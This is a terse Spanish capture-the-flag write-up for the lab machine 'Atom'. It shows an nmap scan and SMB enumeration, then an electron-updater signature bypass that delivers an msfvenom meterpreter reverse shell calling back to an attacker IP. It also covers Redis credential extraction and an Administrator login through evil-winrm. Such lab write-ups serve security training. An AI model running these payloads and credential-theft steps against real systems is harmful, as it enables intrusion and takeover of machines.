# Atom

**OS**: Windows \
**Dificultad**: Medio \
**Puntos**: 30

## Resumen

## Nmap Scan

`nmap -p- -sV -sC -oN nmap.txt 10.10.10.237`

```
Nmap scan report for 10.10.10.237
Host is up (0.063s latency).
Not shown: 65528 filtered ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp  open  msrpc        Microsoft Windows RPC
443/tcp  open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6379/tcp open  redis        Redis key-value store
7680/tcp open  pando-pub?
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows
```

## Enumeración

- `smbclient -L 10.10.10.237`
- `smbmap -u " " -H 10.10.10.237`



- `smbclient //10.10.10.237/Software_Updates`
- `get UAT_Testing_Procedures.pdf`

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.33 LPORT=4444 -f exe -o "doom's.exe"`
`sha512sum "doom's.exe" | cut -d " " -f 1 | xxd -r -p | base64 -w0`

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.33
run
```

`python3 -m http.server 80`
`smbclient //10.10.10.237/Software_Updates`
`cd client1`
`put latest.yml`


## Escalada de Privilegios (User)

`cat "c:\Program Files\Redis\redis.windows.conf"`
`requirepass kidvscat_yes_kidvscat`

```
redis-cli.exe -a kidvscat_yes_kidvscat
select 0
keys *
get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
```

`Administrator : Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi`

`ls -la "c:\users\jason\downloads\`

`python3 decrypt.py`
`Administrator:kidvscat_admin_@123`

`evil-winrm -i 10.10.10.237 -u Administrator -p 'kidvscat_admin_@123'`


## Escalada de Privilegios (Root)




## Referencias
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html \
https://www.exploit-db.com/exploits/49409